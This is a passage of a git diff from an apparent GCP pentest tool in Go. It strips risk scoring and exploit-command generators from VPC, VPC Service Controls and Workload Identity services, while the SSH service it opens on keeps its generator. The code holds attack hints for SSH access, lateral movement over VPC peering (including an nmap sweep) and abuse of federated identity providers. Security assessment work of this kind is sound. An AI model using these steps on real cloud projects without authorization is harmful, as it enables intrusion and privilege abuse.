"true" { - access.OSLoginEnabled = true - } - case "block-project-ssh-keys": - if item.Value != nil && strings.ToLower(*item.Value) == "true" { - access.BlockProjectKeys = true - } - case "ssh-keys": - if item.Value != nil { - keys := s.parseSSHKeys(*item.Value, projectID, "instance", instance.Name, zoneName) - instanceKeys = append(instanceKeys, keys...) - access.SSHKeysCount = len(keys) - } - } - } - } - - // Generate SSH commands - access.SSHCommands = s.generateSSHCommands(access) - - // Analyze risk - access.RiskLevel, access.RiskReasons = s.analyzeInstanceSSHRisk(access) - - instances = append(instances, access) - } - } - return nil - }) - - return instances, instanceKeys, err -} - -// GetOSLoginUsers gets users with OS Login access (requires oslogin API) -func (s *SSHOsLoginService) GetOSLoginUsers(projectID string) ([]OSLoginUser, error) { - ctx := context.Background() - _, err := oslogin.NewService(ctx) - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "oslogin.googleapis.com") - } - - // Note: OS Login API requires querying per-user, so we return empty - // The actual users would need to be enumerated from IAM bindings with - // roles/compute.osLogin, roles/compute.osAdminLogin, roles/compute.osLoginExternalUser - - return []OSLoginUser{}, nil -} - -func (s *SSHOsLoginService) parseSSHKeys(sshKeysValue, projectID, source, instanceName, zone string) []SSHKeyInfo { - var keys []SSHKeyInfo - - lines := strings.Split(sshKeysValue, "\n") - for _, line := range lines { - line = strings.TrimSpace(line) - if line == "" || strings.HasPrefix(line, "#") { - continue - } - - // Format: username:ssh-rsa AAAAB3... comment - // or: ssh-rsa AAAAB3... username - parts := strings.SplitN(line, ":", 2) - - var username, keyData string - if len(parts) == 2 { - username = parts[0] - keyData = parts[1] - } else { - keyData = line - } - - keyParts := strings.Fields(keyData) - if len(keyParts) < 2 { - continue - } - - keyType := keyParts[0] - if username == "" && len(keyParts) >= 3 { - username = keyParts[2] - } - - key := SSHKeyInfo{ - ProjectID: projectID, - Username: username, - KeyType: keyType, - Source: source, - InstanceName: instanceName, - Zone: zone, - } - - // Generate SSH commands - if source == "instance" && instanceName != "" { - key.ExploitCommands = []string{ - fmt.Sprintf("# SSH as %s to instance %s:", username, instanceName), - fmt.Sprintf("gcloud compute ssh %s@%s --zone=%s --project=%s", username, instanceName, zone, projectID), - } - } else { - key.ExploitCommands = []string{ - fmt.Sprintf("# Project-wide SSH key for user: %s", username), - fmt.Sprintf("# This key grants access to all instances not blocking project keys"), - } - } - - keys = append(keys, key) - } - - return keys -} - -func (s *SSHOsLoginService) generateSSHCommands(access InstanceSSHAccess) []string { - var commands []string - - commands = append(commands, - fmt.Sprintf("# SSH to instance %s:", access.InstanceName)) - - // gcloud command - commands = append(commands, - fmt.Sprintf("gcloud compute ssh %s --zone=%s --project=%s", access.InstanceName, access.Zone, access.ProjectID)) - - // Direct SSH if external IP - if access.ExternalIP != "" { - commands = append(commands, - fmt.Sprintf("# Direct SSH (if key is authorized):\nssh -i ~/.ssh/google_compute_engine %s", access.ExternalIP)) - } - - // IAP tunnel if no external IP - if access.ExternalIP == "" { - commands = append(commands, - fmt.Sprintf("# Via IAP tunnel (no external IP):\ngcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap", access.InstanceName, access.Zone, access.ProjectID)) - } - - return commands -} - -func (s *SSHOsLoginService) analyzeOSLoginRisk(config *OSLoginConfig) (string, []string) { - var reasons []string - score := 0 - - if !config.OSLoginEnabled { - reasons = append(reasons, "OS Login not enabled - using legacy SSH keys") - score += 2 - } - - if config.OSLoginEnabled && !config.OSLogin2FAEnabled { - reasons = append(reasons, "OS Login enabled but 2FA not required") - score += 1 - } - - if !config.BlockProjectSSHKeys && !config.OSLoginEnabled { - reasons = append(reasons, "Project-wide SSH keys allowed") - score += 1 - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *SSHOsLoginService) analyzeInstanceSSHRisk(access InstanceSSHAccess) (string, []string) { - var reasons []string - score := 0 - - if access.ExternalIP != "" && !access.OSLoginEnabled { - reasons = append(reasons, "External IP with legacy SSH keys") - score += 2 - } - - if access.SSHKeysCount > 5 { - reasons = append(reasons, fmt.Sprintf("Many SSH keys configured (%d)", access.SSHKeysCount)) - score += 1 - } - - if !access.BlockProjectKeys && !access.OSLoginEnabled { - reasons = append(reasons, "Accepts project-wide SSH keys") - score += 1 - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} diff --git a/gcp/services/vpcService/vpcService.go b/gcp/services/vpcService/vpcService.go index 78e7a68d..2da8705a 100644 --- a/gcp/services/vpcService/vpcService.go +++ b/gcp/services/vpcService/vpcService.go @@ -32,8 +32,6 @@ type VPCNetworkInfo struct { Subnetworks []string `json:"subnetworks"` Peerings []string `json:"peerings"` FirewallPolicyCount int `json:"firewallPolicyCount"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` } // SubnetInfo represents a subnetwork @@ -48,8 +46,6 @@ type SubnetInfo struct { Purpose string `json:"purpose"` EnableFlowLogs bool `json:"enableFlowLogs"` SecondaryIPRanges []string `json:"secondaryIpRanges"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` } // VPCPeeringInfo represents a VPC peering connection @@ -63,24 +59,18 @@ type VPCPeeringInfo struct { ExportCustomRoutes bool `json:"exportCustomRoutes"` ImportCustomRoutes bool `json:"importCustomRoutes"` ExchangeSubnetRoutes bool `json:"exchangeSubnetRoutes"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - LateralMovementPath bool `json:"lateralMovementPath"` - ExploitCommands []string `json:"exploitCommands"` } // RouteInfo represents a route type RouteInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Network string `json:"network"` - DestRange string `json:"destRange"` - NextHopType string `json:"nextHopType"` - NextHop string `json:"nextHop"` - Priority int64 `json:"priority"` - Tags []string `json:"tags"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + DestRange string `json:"destRange"` + NextHopType string `json:"nextHopType"` + NextHop string `json:"nextHop"` + Priority int64 `json:"priority"` + Tags []string `json:"tags"` } // ListVPCNetworks retrieves all VPC networks @@ -184,11 +174,7 @@ func (s *VPCService) ListVPCPeerings(projectID string) ([]VPCPeeringInfo, error) ExportCustomRoutes: peering.ExportCustomRoutes, ImportCustomRoutes: peering.ImportCustomRoutes, ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, - RiskReasons: []string{}, - ExploitCommands: []string{}, } - info.RiskLevel, info.RiskReasons, info.LateralMovementPath = s.analyzePeeringRisk(info) - info.ExploitCommands = s.generatePeeringExploitCommands(info) peerings = append(peerings, info) } } @@ -234,7 +220,6 @@ func (s *VPCService) parseNetwork(network *compute.Network, projectID string) VP AutoCreateSubnetworks: network.AutoCreateSubnetworks, RoutingMode: network.RoutingConfig.RoutingMode, MTU: network.Mtu, - RiskReasons: []string{}, } for _, subnet := range network.Subnetworks { @@ -245,8 +230,6 @@ func (s *VPCService) parseNetwork(network *compute.Network, projectID string) VP info.Peerings = append(info.Peerings, peering.Name) } - info.RiskLevel, info.RiskReasons = s.analyzeNetworkRisk(info) - return info } @@ -260,7 +243,6 @@ func (s *VPCService) parseSubnet(subnet *compute.Subnetwork, projectID string) S GatewayAddress: subnet.GatewayAddress, PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, Purpose: subnet.Purpose, - RiskReasons: []string{}, } if subnet.LogConfig != nil { @@ -271,8 +253,6 @@ func (s *VPCService) parseSubnet(subnet *compute.Subnetwork, projectID string) S info.SecondaryIPRanges = append(info.SecondaryIPRanges, fmt.Sprintf("%s:%s", secondary.RangeName, secondary.IpCidrRange)) } - info.RiskLevel, info.RiskReasons = s.analyzeSubnetRisk(info) - return info } @@ -284,7 +264,6 @@ func (s *VPCService) parseRoute(route *compute.Route, projectID string) RouteInf DestRange: route.DestRange, Priority: route.Priority, Tags: route.Tags, - RiskReasons: []string{}, } // Determine next hop type @@ -311,133 +290,9 @@ func (s *VPCService) parseRoute(route *compute.Route, projectID string) RouteInf info.NextHop = extractName(route.NextHopVpnTunnel) } - info.RiskLevel, info.RiskReasons = s.analyzeRouteRisk(info) - return info } -func (s *VPCService) analyzeNetworkRisk(network VPCNetworkInfo) (string, []string) { - var reasons []string - score := 0 - - // Auto-create subnetworks can be less controlled - if network.AutoCreateSubnetworks { - reasons = append(reasons, "Auto-create subnetworks enabled") - score += 1 - } - - // Has peerings (potential lateral movement path) - if len(network.Peerings) > 0 { - reasons = append(reasons, fmt.Sprintf("Has %d VPC peering(s)", len(network.Peerings))) - score += 1 - } - - if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *VPCService) analyzeSubnetRisk(subnet SubnetInfo) (string, []string) { - var reasons []string - score := 0 - - // No Private Google Access - if !subnet.PrivateIPGoogleAccess { - reasons = append(reasons, "Private Google Access not enabled") - score += 1 - } - - // No flow logs - if !subnet.EnableFlowLogs { - reasons = append(reasons, "VPC Flow Logs not enabled") - score += 1 - } - - if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *VPCService) analyzePeeringRisk(peering VPCPeeringInfo) (string, []string, bool) { - var reasons []string - score := 0 - lateralMovement := false - - // Exports custom routes (potential route leakage) - if peering.ExportCustomRoutes { - reasons = append(reasons, "Exports custom routes to peer") - score += 1 - } - - // Imports custom routes - if peering.ImportCustomRoutes { - reasons = append(reasons, "Imports custom routes from peer") - score += 1 - } - - // Cross-project peering - lateral movement opportunity - if peering.PeerProjectID != "" && peering.PeerProjectID != peering.ProjectID { - reasons = append(reasons, fmt.Sprintf("Cross-project peering to %s", peering.PeerProjectID)) - lateralMovement = true - score += 2 - } - - // Exchange subnet routes - full network visibility - if peering.ExchangeSubnetRoutes { - reasons = append(reasons, "Exchanges subnet routes (full network reachability)") - lateralMovement = true - score += 1 - } - - // Active peering - if peering.State == "ACTIVE" && lateralMovement { - reasons = append(reasons, "Active peering enables lateral movement") - score += 1 - } - - if score >= 3 { - return "HIGH", reasons, lateralMovement - } else if score >= 2 { - return "MEDIUM", reasons, lateralMovement - } else if score >= 1 { - return "LOW", reasons, lateralMovement - } - return "INFO", reasons, lateralMovement -} - -func (s *VPCService) generatePeeringExploitCommands(peering VPCPeeringInfo) []string { - var commands []string - - if peering.State != "ACTIVE" { - return commands - } - - commands = append(commands, - fmt.Sprintf("# VPC Peering: %s -> %s", peering.Network, peering.PeerNetwork)) - - if peering.PeerProjectID != "" && peering.PeerProjectID != peering.ProjectID { - commands = append(commands, - fmt.Sprintf("# Target project: %s", peering.PeerProjectID), - fmt.Sprintf("# List instances in peer project:\ngcloud compute instances list --project=%s", peering.PeerProjectID), - fmt.Sprintf("# List subnets in peer project:\ngcloud compute networks subnets list --project=%s", peering.PeerProjectID)) - } - - if peering.ExchangeSubnetRoutes { - commands = append(commands, - "# Network scan from compromised instance in this VPC:", - "# nmap -sn ", - "# Can reach resources in peered VPC via internal IPs") - } - - return commands -} - func extractProjectFromNetwork(networkPath string) string { // Format: https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network} // or: projects/{project}/global/networks/{network} @@ -450,30 +305,6 @@ func extractProjectFromNetwork(networkPath string) string { return "" } -func (s *VPCService) analyzeRouteRisk(route RouteInfo) (string, []string) { - var reasons []string - score := 0 - - // Route to 0.0.0.0/0 via instance (NAT instance) - if route.DestRange == "0.0.0.0/0" && route.NextHopType == "instance" { - reasons = append(reasons, "Default route via instance (NAT instance)") - score += 1 - } - - // Route to specific external IP via instance - if route.NextHopType == "ip" { - reasons = append(reasons, "Route to specific IP address") - score += 1 - } - - if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - func extractName(fullPath string) string { parts := strings.Split(fullPath, "/") if len(parts) > 0 { diff --git a/gcp/services/vpcscService/vpcscService.go b/gcp/services/vpcscService/vpcscService.go index b07eceac..9d040989 100644 --- a/gcp/services/vpcscService/vpcscService.go +++ b/gcp/services/vpcscService/vpcscService.go @@ -42,20 +42,16 @@ type ServicePerimeterInfo struct { UpdateTime string `json:"updateTime"` // Status configuration - Resources []string `json:"resources"` // Projects in the perimeter - RestrictedServices []string `json:"restrictedServices"` // Services protected - AccessLevels []string `json:"accessLevels"` // Access levels allowed + Resources []string `json:"resources"` // Projects in the perimeter + RestrictedServices []string `json:"restrictedServices"` // Services protected + AccessLevels []string `json:"accessLevels"` // Access levels allowed VPCAccessibleServices []string `json:"vpcAccessibleServices"` // Ingress/Egress policies - IngressPolicyCount int `json:"ingressPolicyCount"` - EgressPolicyCount int `json:"egressPolicyCount"` - HasIngressRules bool `json:"hasIngressRules"` - HasEgressRules bool `json:"hasEgressRules"` - - // Security analysis - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + IngressPolicyCount int `json:"ingressPolicyCount"` + EgressPolicyCount int `json:"egressPolicyCount"` + HasIngressRules bool `json:"hasIngressRules"` + HasEgressRules bool `json:"hasEgressRules"` } // AccessLevelInfo represents an access level @@ -71,10 +67,6 @@ type AccessLevelInfo struct { IPSubnetworks []string `json:"ipSubnetworks"` Regions []string `json:"regions"` Members []string `json:"members"` - - // Security analysis - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` } // ListAccessPolicies retrieves all access policies for an organization @@ -189,7 +181,6 @@ func (s *VPCSCService) parsePerimeter(perimeter *accesscontextmanager.ServicePer PolicyName: policyName, PerimeterType: perimeter.PerimeterType, Description: perimeter.Description, - RiskReasons: []string{}, } // Parse status configuration @@ -213,8 +204,6 @@ func (s *VPCSCService) parsePerimeter(perimeter *accesscontextmanager.ServicePer } } - info.RiskLevel, info.RiskReasons = s.analyzePerimeterRisk(info) - return info } @@ -224,7 +213,6 @@ func (s *VPCSCService) parseAccessLevel(level *accesscontextmanager.AccessLevel, Title: level.Title, PolicyName: policyName, Description: level.Description, - RiskReasons: []string{}, } if level.Basic != nil && len(level.Basic.Conditions) > 0 { @@ -235,92 +223,9 @@ func (s *VPCSCService) parseAccessLevel(level *accesscontextmanager.AccessLevel, } } - info.RiskLevel, info.RiskReasons = s.analyzeAccessLevelRisk(info) - return info } -func (s *VPCSCService) analyzePerimeterRisk(perimeter ServicePerimeterInfo) (string, []string) { - var reasons []string - score := 0 - - // No restricted services - if len(perimeter.RestrictedServices) == 0 { - reasons = append(reasons, "No services are restricted by perimeter") - score += 2 - } - - // Permissive ingress rules - if perimeter.HasIngressRules { - reasons = append(reasons, fmt.Sprintf("Has %d ingress policies (review for overly permissive rules)", perimeter.IngressPolicyCount)) - score += 1 - } - - // Permissive egress rules - if perimeter.HasEgressRules { - reasons = append(reasons, fmt.Sprintf("Has %d egress policies (review for data exfiltration risk)", perimeter.EgressPolicyCount)) - score += 1 - } - - // No resources protected - if len(perimeter.Resources) == 0 { - reasons = append(reasons, "No resources are protected by perimeter") - score += 2 - } - - // Bridge perimeter (less restrictive by design) - if perimeter.PerimeterType == "PERIMETER_TYPE_BRIDGE" { - reasons = append(reasons, "Bridge perimeter - allows cross-perimeter access") - score += 1 - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *VPCSCService) analyzeAccessLevelRisk(level AccessLevelInfo) (string, []string) { - var reasons []string - score := 0 - - // Check for overly broad IP ranges - for _, ip := range level.IPSubnetworks { - if ip == "0.0.0.0/0" || ip == "::/0" { - reasons = append(reasons, "Access level allows all IP addresses") - score += 3 - break - } - } - - // No IP restrictions - if len(level.IPSubnetworks) == 0 && len(level.Regions) == 0 && len(level.Members) == 0 { - reasons = append(reasons, "Access level has no restrictions defined") - score += 2 - } - - // allUsers or allAuthenticatedUsers - for _, member := range level.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { - reasons = append(reasons, fmt.Sprintf("Access level includes %s", member)) - score += 3 - } - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - func extractPolicyName(fullName string) string { parts := strings.Split(fullName, "/") if len(parts) >= 2 { diff --git a/gcp/services/workloadIdentityService/workloadIdentityService.go b/gcp/services/workloadIdentityService/workloadIdentityService.go index ed498396..161c020f 100644 --- a/gcp/services/workloadIdentityService/workloadIdentityService.go +++ b/gcp/services/workloadIdentityService/workloadIdentityService.go @@ -28,37 +28,31 @@ type WorkloadIdentityPool struct { // WorkloadIdentityProvider represents a Workload Identity Pool Provider type WorkloadIdentityProvider struct { - Name string `json:"name"` - DisplayName string `json:"displayName"` - Description string `json:"description"` - PoolID string `json:"poolId"` - ProviderID string `json:"providerId"` - ProjectID string `json:"projectId"` - ProviderType string `json:"providerType"` // aws, oidc, saml - Disabled bool `json:"disabled"` - AttributeMapping map[string]string `json:"attributeMapping"` - AttributeCondition string `json:"attributeCondition"` // CEL expression + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + ProjectID string `json:"projectId"` + ProviderType string `json:"providerType"` // aws, oidc, saml + Disabled bool `json:"disabled"` + AttributeMapping map[string]string `json:"attributeMapping"` + AttributeCondition string `json:"attributeCondition"` // CEL expression // AWS specific - AWSAccountID string `json:"awsAccountId"` + AWSAccountID string `json:"awsAccountId"` // OIDC specific - OIDCIssuerURI string `json:"oidcIssuerUri"` - AllowedAudiences []string `json:"allowedAudiences"` - // Security analysis - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - ExploitCommands []string `json:"exploitCommands"` + OIDCIssuerURI string `json:"oidcIssuerUri"` + AllowedAudiences []string `json:"allowedAudiences"` } // FederatedIdentityBinding represents a binding from federated identity to GCP SA type FederatedIdentityBinding struct { - ProjectID string `json:"projectId"` - PoolID string `json:"poolId"` - ProviderID string `json:"providerId"` - GCPServiceAccount string `json:"gcpServiceAccount"` - ExternalSubject string `json:"externalSubject"` - AttributeCondition string `json:"attributeCondition"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + ProjectID string `json:"projectId"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + GCPServiceAccount string `json:"gcpServiceAccount"` + ExternalSubject string `json:"externalSubject"` + AttributeCondition string `json:"attributeCondition"` } // ListWorkloadIdentityPools lists all Workload Identity Pools in a project @@ -127,7 +121,6 @@ func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolI Disabled: provider.Disabled, AttributeMapping: provider.AttributeMapping, AttributeCondition: provider.AttributeCondition, - RiskReasons: []string{}, } // Determine provider type and extract specific config @@ -142,10 +135,6 @@ func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolI wip.ProviderType = "SAML" } - // Perform security analysis - wip.RiskLevel, wip.RiskReasons = s.analyzeProviderRisk(wip) - wip.ExploitCommands = s.generateProviderExploitCommands(wip, projectID) - providers = append(providers, wip) } return nil @@ -215,7 +204,6 @@ func (s *WorkloadIdentityService) parseFederatedIdentityBinding(member, gcpSA, p ProjectID: projectID, GCPServiceAccount: gcpSA, ExternalSubject: member, - RiskReasons: []string{}, } // Extract pool ID @@ -226,154 +214,9 @@ func (s *WorkloadIdentityService) parseFederatedIdentityBinding(member, gcpSA, p } } - // Analyze risk - score := 0 - - // principalSet is broader than principal - if strings.HasPrefix(member, "principalSet://") { - fib.RiskReasons = append(fib.RiskReasons, - "Uses principalSet (grants access to multiple external identities)") - score += 2 - } - - // Check for wildcards - if strings.Contains(member, "*") { - fib.RiskReasons = append(fib.RiskReasons, - "Contains wildcard in subject/attribute matching") - score += 3 - } - - // Check for common risky patterns - if strings.Contains(member, "attribute.repository") { - fib.RiskReasons = append(fib.RiskReasons, - "Matches on repository attribute (GitHub Actions likely)") - } - - if score >= 3 { - fib.RiskLevel = "HIGH" - } else if score >= 2 { - fib.RiskLevel = "MEDIUM" - } else if score >= 1 { - fib.RiskLevel = "LOW" - } else { - fib.RiskLevel = "INFO" - } - return fib } -// analyzeProviderRisk analyzes the security risk of a provider configuration -func (s *WorkloadIdentityService) analyzeProviderRisk(provider WorkloadIdentityProvider) (string, []string) { - var reasons []string - score := 0 - - // No attribute condition means any authenticated identity from provider can federate - if provider.AttributeCondition == "" { - reasons = append(reasons, - "No attribute condition set - any identity from provider can authenticate") - score += 3 - } - - // AWS provider risks - if provider.ProviderType == "AWS" { - reasons = append(reasons, - fmt.Sprintf("AWS federation enabled from account: %s", provider.AWSAccountID)) - score += 1 - } - - // OIDC provider risks - if provider.ProviderType == "OIDC" { - // Check for common public OIDC providers - knownProviders := map[string]string{ - "token.actions.githubusercontent.com": "GitHub Actions", - "gitlab.com": "GitLab CI", - "accounts.google.com": "Google", - "sts.windows.net": "Azure AD", - "cognito-identity.amazonaws.com": "AWS Cognito", - } - - for pattern, name := range knownProviders { - if strings.Contains(provider.OIDCIssuerURI, pattern) { - reasons = append(reasons, - fmt.Sprintf("OIDC provider: %s (%s)", name, provider.OIDCIssuerURI)) - if name == "GitHub Actions" && provider.AttributeCondition == "" { - reasons = append(reasons, - "CRITICAL: GitHub Actions without attribute condition - any public repo can authenticate!") - score += 4 - } - } - } - } - - // Check attribute mapping for risky patterns - if mapping, ok := provider.AttributeMapping["google.subject"]; ok { - if mapping == "assertion.sub" { - reasons = append(reasons, - "Subject mapped directly from assertion.sub") - } - } - - if score >= 4 { - return "CRITICAL", reasons - } else if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -// generateProviderExploitCommands generates exploitation commands for a provider -func (s *WorkloadIdentityService) generateProviderExploitCommands(provider WorkloadIdentityProvider, projectID string) []string { - var commands []string - - commands = append(commands, - fmt.Sprintf("# Workload Identity Provider: %s/%s", provider.PoolID, provider.ProviderID)) - - switch provider.ProviderType { - case "AWS": - commands = append(commands, - fmt.Sprintf("# From AWS account %s, use STS to federate:", provider.AWSAccountID), - fmt.Sprintf("# 1. Get AWS credentials for a role in account %s", provider.AWSAccountID), - "# 2. Exchange for GCP access token:", - fmt.Sprintf("gcloud iam workload-identity-pools create-cred-config \\"), - fmt.Sprintf(" projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\", - projectID, provider.PoolID, provider.ProviderID), - " --aws --output-file=gcp-creds.json", - ) - - case "OIDC": - if strings.Contains(provider.OIDCIssuerURI, "github") { - commands = append(commands, - "# From GitHub Actions workflow, add:", - "permissions:", - " id-token: write", - " contents: read", - "", - "# Then use:", - fmt.Sprintf("gcloud iam workload-identity-pools create-cred-config \\"), - fmt.Sprintf(" projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\", - projectID, provider.PoolID, provider.ProviderID), - " --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\", - " --output-file=gcp-creds.json", - ) - } else { - commands = append(commands, - fmt.Sprintf("# OIDC issuer: %s", provider.OIDCIssuerURI), - "# Get an OIDC token from the issuer, then exchange:", - fmt.Sprintf("gcloud iam workload-identity-pools create-cred-config \\"), - fmt.Sprintf(" projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\", - projectID, provider.PoolID, provider.ProviderID), - " --output-file=gcp-creds.json", - ) - } - } - - return commands -} - // extractLastPart extracts the last part of a resource name func extractLastPart(name string) string { parts := strings.Split(name, "/") diff --git a/globals/gcp.go b/globals/gcp.go index 3311c10b..42cd4ae6 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -25,7 +25,7 @@ const GCP_DNS_MODULE_NAME string = "dns" const GCP_SCHEDULER_MODULE_NAME string = "scheduler" const GCP_ORGANIZATIONS_MODULE_NAME string = "organizations" const GCP_APIKEYS_MODULE_NAME string = "apikeys" -const GCP_ENDPOINTS_MODULE_NAME string = "endpoints" +const GCP_EXPOSURE_MODULE_NAME string = "exposure" const GCP_CLOUDBUILD_MODULE_NAME string = "cloudbuild" const GCP_DATAFLOW_MODULE_NAME string = "dataflow" const GCP_COMPOSER_MODULE_NAME string = "composer" @@ -45,33 +45,34 @@ const GCP_BEYONDCORP_MODULE_NAME string = "beyondcorp" const GCP_ACCESSLEVELS_MODULE_NAME string = "access-levels" // Pentest modules +const GCP_KEYS_MODULE_NAME string = "keys" const GCP_HMACKEYS_MODULE_NAME string = "hmac-keys" const GCP_PRIVESC_MODULE_NAME string = "privesc" const GCP_ORGPOLICIES_MODULE_NAME string = "org-policies" const GCP_BUCKETENUM_MODULE_NAME string = "bucket-enum" const GCP_CROSSPROJECT_MODULE_NAME string = "cross-project" -const GCP_CUSTOMROLES_MODULE_NAME string = "custom-roles" const GCP_PUBLICRESOURCES_MODULE_NAME string = "public-resources" const GCP_SOURCEREPOS_MODULE_NAME string = "source-repos" const GCP_LOGGINGGAPS_MODULE_NAME string = "logging-gaps" const GCP_SSHOSLOGIN_MODULE_NAME string = "ssh-oslogin" const GCP_SERVICEAGENTS_MODULE_NAME string = "service-agents" const GCP_DOMAINWIDEDELEGATION_MODULE_NAME string = "domain-wide-delegation" -const GCP_NETWORKENDPOINTS_MODULE_NAME string = "network-endpoints" +const GCP_PRIVATESERVICECONNECT_MODULE_NAME string = "private-service-connect" const GCP_CLOUDARMOR_MODULE_NAME string = "cloud-armor" const GCP_CERTMANAGER_MODULE_NAME string = "cert-manager" +// Resource IAM module +const GCP_RESOURCEIAM_MODULE_NAME string = "resource-iam" + // New security analysis modules (Azure equivalents) const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" -const GCP_NETWORKEXPOSURE_MODULE_NAME string = "network-exposure" const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" -const GCP_IDENTITYPROTECTION_MODULE_NAME string = "identity-protection" // Verbosity levels (matching Azure pattern) var GCP_VERBOSITY int = 0 diff --git a/go.mod b/go.mod index 6289fc6f..b46a1634 100644 --- a/go.mod +++ b/go.mod @@ -92,6 +92,7 @@ require ( cloud.google.com/go/auth/oauth2adapt v0.2.8 // indirect cloud.google.com/go/orgpolicy v1.15.1 // indirect cloud.google.com/go/osconfig v1.15.1 // indirect + cloud.google.com/go/pubsub/v2 v2.0.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/resourcemapping v0.54.0 // indirect @@ -124,6 +125,7 @@ require ( github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10 // indirect github.com/spiffe/go-spiffe/v2 v2.6.0 // indirect github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect + go.opencensus.io v0.24.0 // indirect go.opentelemetry.io/auto/sdk v1.2.1 // indirect go.opentelemetry.io/contrib/detectors/gcp v1.39.0 // indirect go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.64.0 // indirect @@ -140,8 +142,10 @@ require ( require ( cloud.google.com/go/asset v1.22.0 + cloud.google.com/go/kms v1.23.2 cloud.google.com/go/logging v1.13.1 cloud.google.com/go/monitoring v1.24.3 + cloud.google.com/go/pubsub v1.50.1 cloud.google.com/go/securitycenter v1.38.1 github.com/aws/aws-sdk-go-v2/service/kms v1.49.4 golang.org/x/oauth2 v0.34.0 diff --git a/go.sum b/go.sum index f714eda3..699fb8a7 100644 --- a/go.sum +++ b/go.sum @@ -1,5 +1,6 @@ cel.dev/expr v0.25.1 h1:1KrZg61W6TWSxuNZ37Xy49ps13NUovb66QLprthtwi4= cel.dev/expr v0.25.1/go.mod h1:hrXvqGP6G6gyx8UAHSHJ5RGk//1Oj5nXQ2NI02Nrsg4= +cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go v0.123.0 h1:2NAUJwPR47q+E35uaJeYoNhuNEM9kM8SjgRgdeOJUSE= cloud.google.com/go v0.123.0/go.mod h1:xBoMV08QcqUGuPW65Qfm1o9Y4zKZBpGS+7bImXLTAZU= cloud.google.com/go/accesscontextmanager v1.9.7 h1:aKIfg7Jyc73pe8bzx0zypNdS5gfFdSvFvB8YNA9k2kA= @@ -20,6 +21,8 @@ cloud.google.com/go/datacatalog v1.26.1 h1:bCRKA8uSQN8wGW3Tw0gwko4E9a64GRmbW1nCb cloud.google.com/go/datacatalog v1.26.1/go.mod h1:2Qcq8vsHNxMDgjgadRFmFG47Y+uuIVsyEGUrlrKEdrg= cloud.google.com/go/iam v1.5.3 h1:+vMINPiDF2ognBJ97ABAYYwRgsaqxPbQDlMnbHMjolc= cloud.google.com/go/iam v1.5.3/go.mod h1:MR3v9oLkZCTlaqljW6Eb2d3HGDGK5/bDv93jhfISFvU= +cloud.google.com/go/kms v1.23.2 h1:4IYDQL5hG4L+HzJBhzejUySoUOheh3Lk5YT4PCyyW6k= +cloud.google.com/go/kms v1.23.2/go.mod h1:rZ5kK0I7Kn9W4erhYVoIRPtpizjunlrfU4fUkumUp8g= 